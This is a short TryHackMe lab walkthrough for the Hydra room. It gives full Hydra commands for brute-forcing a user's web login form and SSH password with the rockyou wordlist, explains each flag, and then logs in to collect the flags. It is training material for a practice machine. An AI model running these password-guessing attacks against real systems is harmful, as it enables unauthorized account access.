TryHackMe: Hydra Walkthrough
--
Task [1] Hydra Introduction
Task [2] Using Hydra
Read the information carefully.
Use nmap to check the open ports. The open ports are 22 and 80 and the services running are ssh and http respectively.
#1 Use Hydra to bruteforce molly’s web password. What is flag 1?
Command used: hydra -l molly -P rockyou.txt MACHINE_IP http-post-form “/login:username=^USER^&password=^PASS^:F=incorrect” -V
-l used to specify username
-P used to specify password list
http-post-form indicates the request type i.e. POST request
/login login page URL
:username= form field
^USER^ tells hydra to put username at this location
password= form field
^PASS^ tells hydra to put password at this location
-V verborse output
After several attempts we found the password.
Use the username and password to login.
Here we found the flag 1.
#2 Use Hydra to bruteforce molly’s SSH password. What is flag 2?
Command used: hydra -l molly -P rockyou.txt MACHINE_IP -t 4 ssh
-l used to specify username
-P used to specify password list
-t specifies the number of threads to use
After several attempts we found the password.
Use the command ssh molly@MACHINE_IP to connect to ssh service. Use the password that we found above. Here we found the flag 2.
Thank you…
